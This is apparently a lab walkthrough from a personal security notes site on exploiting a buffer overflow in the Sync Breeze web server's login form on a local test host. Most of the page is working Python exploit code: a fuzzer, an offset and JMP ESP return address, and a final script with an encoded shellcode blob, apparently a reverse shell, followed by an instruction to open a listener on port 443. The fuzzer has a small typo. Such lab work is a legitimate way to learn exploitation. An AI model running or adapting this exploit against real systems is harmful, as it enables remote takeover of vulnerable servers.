sync breeze

Scan machine
we start to scan port number by using unicornscan tool which is faster than nmap. you can install it by this command sudo apt install unicornscan
Screenshot 2025-03-13 231202.png
```
sudo unicornscan -ImT 10.0.2.4:1-2000 # 1-2000 scan ports from 1 to 2000
```
we discovered this ports is open let’s know what’s the service is running for each port

after search we find this is old version which is vulnerable to BOF so lets download this service and try to exploit it in our services

Fuzzing

open the browser and Wireshark tool then show the request was sent

try to create python code to smash the vulnerable machine

#!/bin/python3
import socket
import sys
import time
target_ip = "10.0.2.4"
target_port = 80  
l = 100
step = 100 
while True:
    try:
        payload = "username=" + "A" * l + "&password=1234"
        request=""
        request+="POST /login HTTP/1.1\r\n"
        request+="Host: 10.0.2.4\r\n"
        request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0\r\n"
        request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        request+="Accept-Language: en-US,en;q=0.5\r\n"
        request+="Accept-Encoding: gzip, deflate\r\n"
        request+="Content-Type: application/x-www-form-urlencoded\r\n"
        request+=f"Content-Length: {len(payload)}\r\n"
        request+="Origin: http://10.0.2.4"
        request+="Connection: keep-alive\r\n"
        request+="Referer: http://10.0.2.4/login\r\n"
        request+="Upgrade-Insecure-Requests: 1\r\n"
        request+="Priority: u=0, i\r\n"
        request+="\r\n"
        request+=payloadS

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, 80))
        print(f"Sending {l} bytes...")
        s.send(request.encode())
        response = s.recv(1024) 
        print(f"Response: {response.decode(errors='ignore')}")
        s.close()
        print(f"Trying payload size: {l} bytes...")
        l += step
        time.sleep(1)
    except Exception as e:
        print(f"Fuzzing crashed at {l} bytes")
        sys.exit()

run this script and we will notice this machine is crashed after 800 char sent

locate offset
create offset by using Metasploit

./pattern_create.rb -l 800

then send it by python script we will notice this machine is crashed

and the offset is 780

let’s know which is four is overwrite in EIP

Hijack execution
use nasm shell tool to transfer JMP ESP to op code

use mona to search on this code we found this add 10090C83

after transfer this address to Little Endian

#!/bin/python3
import socket
import sys
import time

target_ip = "10.0.2.4"
target_port = 80   

add = b"A" * 780 + b"\x83\x0C\x09\x10" + b"C" * 16
payload = b"username=" + add + b"&password=1234"

request = b"POST /login HTTP/1.1\r\n"
request += b"Host: 10.0.2.4\r\n"
request += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0\r\n"
request += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
request += b"Accept-Language: en-US,en;q=0.5\r\n"
request += b"Accept-Encoding: gzip, deflate\r\n"
request += b"Content-Type: application/x-www-form-urlencoded\r\n"
request += b"Content-Length: " + str(len(payload)).encode() + b"\r\n"
request += b"Origin: http://10.0.2.4\r\n"
request += b"Connection: close\r\n"
request += b"Referer: http://10.0.2.4/login\r\n"
request += b"Upgrade-Insecure-Requests: 1\r\n"
request += b"Priority: u=0, i\r\n"
request += b"\r\n"
request += payload  

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.sendall(request)  
response = s.recv(4096)
print(f"Response: {response.decode(errors='ignore')}")
s.close()

craft shellcode
discover bad characters then generate a shell code

#!/bin/python3
import socket
import sys
import time
target_ip = "10.0.2.4"
target_port = 80   

# ESP add 10090C83

buf =  b""
buf += b"\xd9\xc4\xd9\x74\x24\xf4\x5d\xba\xc3\xd9\xbf\x94"
buf += b"\x29\xc9\xb1\x52\x31\x55\x17\x83\xed\xfc\x03\x96"
buf += b"\xca\x5d\x61\xe4\x05\x23\x8a\x14\xd6\x44\x02\xf1"
buf += b"\xe7\x44\x70\x72\x57\x75\xf2\xd6\x54\xfe\x56\xc2"
buf += b"\xef\x72\x7f\xe5\x58\x38\x59\xc8\x59\x11\x99\x4b"
buf += b"\xda\x68\xce\xab\xe3\xa2\x03\xaa\x24\xde\xee\xfe"
buf += b"\xfd\x94\x5d\xee\x8a\xe1\x5d\x85\xc1\xe4\xe5\x7a"
buf += b"\x91\x07\xc7\x2d\xa9\x51\xc7\xcc\x7e\xea\x4e\xd6"
buf += b"\x63\xd7\x19\x6d\x57\xa3\x9b\xa7\xa9\x4c\x37\x86"
buf += b"\x05\xbf\x49\xcf\xa2\x20\x3c\x39\xd1\xdd\x47\xfe"
buf += b"\xab\x39\xcd\xe4\x0c\xc9\x75\xc0\xad\x1e\xe3\x83"
buf += b"\xa2\xeb\x67\xcb\xa6\xea\xa4\x60\xd2\x67\x4b\xa6"
buf += b"\x52\x33\x68\x62\x3e\xe7\x11\x33\x9a\x46\x2d\x23"
buf += b"\x45\x36\x8b\x28\x68\x23\xa6\x73\xe5\x80\x8b\x8b"
buf += b"\xf5\x8e\x9c\xf8\xc7\x11\x37\x96\x6b\xd9\x91\x61"
buf += b"\x8b\xf0\x66\xfd\x72\xfb\x96\xd4\xb0\xaf\xc6\x4e"
buf += b"\x10\xd0\x8c\x8e\x9d\x05\x02\xde\x31\xf6\xe3\x8e"
buf += b"\xf1\xa6\x8b\xc4\xfd\x99\xac\xe7\xd7\xb1\x47\x12"
buf += b"\xb0\xb7\x97\x1e\x45\xa0\x95\x1e\x44\x8b\x13\xf8"
buf += b"\x2c\xfb\x75\x53\xd9\x62\xdc\x2f\x78\x6a\xca\x4a"
buf += b"\xba\xe0\xf9\xab\x75\x01\x77\xbf\xe2\xe1\xc2\x9d"
buf += b"\xa5\xfe\xf8\x89\x2a\x6c\x67\x49\x24\x8d\x30\x1e"
buf += b"\x61\x63\x49\xca\x9f\xda\xe3\xe8\x5d\xba\xcc\xa8"
buf += b"\xb9\x7f\xd2\x31\x4f\x3b\xf0\x21\x89\xc4\xbc\x15"
buf += b"\x45\x93\x6a\xc3\x23\x4d\xdd\xbd\xfd\x22\xb7\x29"
buf += b"\x7b\x09\x08\x2f\x84\x44\xfe\xcf\x35\x31\x47\xf0"
buf += b"\xfa\xd5\x4f\x89\xe6\x45\xaf\x40\xa3\x76\xfa\xc8"
buf += b"\x82\x1e\xa3\x99\x96\x42\x54\x74\xd4\x7a\xd7\x7c"
buf += b"\xa5\x78\xc7\xf5\xa0\xc5\x4f\xe6\xd8\x56\x3a\x08"
buf += b"\x4e\x56\x6f"

add = b"A" * 780 + b"\x83\x0C\x09\x10" + b"\x90" * 32+buf
payload = b"username=" + add + b"&password=1234"

request = b"POST /login HTTP/1.1\r\n"
request += b"Host: 10.0.2.4\r\n"
request += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0\r\n"
request += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
request += b"Accept-Language: en-US,en;q=0.5\r\n"
request += b"Accept-Encoding: gzip, deflate\r\n"
request += b"Content-Type: application/x-www-form-urlencoded\r\n"
request += b"Content-Length: " + str(len(payload)).encode() + b"\r\n"
request += b"Origin: http://10.0.2.4\r\n"
request += b"Connection: close\r\n"
request += b"Referer: http://10.0.2.4/login\r\n"
request += b"Upgrade-Insecure-Requests: 1\r\n"
request += b"Priority: u=0, i\r\n"
request += b"\r\n"
request += payload  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.sendall(request)  
response = s.recv(4096)  
print(f"Response: {response.decode(errors='ignore')}")
s.close()

execute shellcode
open listener on port 443

Previousvuln server (Base)NextClient-Side Attacks

Last updated 4 months ago